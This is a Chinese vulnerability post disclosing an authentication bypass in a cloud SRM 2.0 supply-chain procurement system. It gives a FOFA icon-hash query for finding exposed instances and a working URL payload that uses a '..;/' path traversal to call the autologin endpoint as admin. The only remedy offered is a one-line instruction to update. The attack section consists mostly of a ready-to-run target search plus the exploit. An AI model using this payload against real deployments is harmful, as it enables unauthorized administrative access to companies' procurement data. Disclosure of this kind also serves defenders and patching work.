某云彩SRM2.0后台绕过漏洞

扣脚大汉在网络2024-09-06 16:01

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码 
icon_hash="1665918155"

漏洞描述

某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。

该系统在autologin接口处存在权限绕过漏洞

漏洞复现

payload

复制代码 
http://ip/adpweb/static/..;/api/sys/app/autologin?loginName=admin

修复建议

更新到最新版本

相关推荐
bjzhang7516 天前
Linux曝出“核弹级”漏洞CVE-2026-31431:攻击者可瞬间提权
linux·漏洞·提权·cve-2026-31431
菩提小狗16 天前
每日安全情报报告 · 2026-05-02
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗17 天前
每日安全情报报告 · 2026-05-05
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗19 天前
每日安全情报报告 · 2026-05-03
网络安全·漏洞·cve·安全情报·每日安全
ybdesire20 天前
间接提示词注入真实样例鉴赏
网络安全·语言模型·漏洞·漏洞分析
菩提小狗20 天前
每日安全情报报告 · 2026-05-01
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗22 天前
每日安全情报报告 · 2026-04-30
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗23 天前
每日安全情报报告 · 2026-04-27
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗23 天前
每日安全情报报告 · 2026-04-29
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗24 天前
每日安全情报报告 · 2026-04-24
网络安全·漏洞·cve·安全情报·每日安全
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03装上就回不去了:CodeGraph 让 AI 编程效率飙升 92%,它到底做了什么?04【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法05CC-Switch & Claude 基于 Linux 服务器安装使用指南06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07几个好用的ip纯净度检测网站08【AI】2026 年具身智能模型和世界模型总结09用了半年 OpenRouter,我换到了 Ofox.ai — 两个 AI API 聚合平台的真实对比10codex app每次打开重连5次Reconnecting问题解决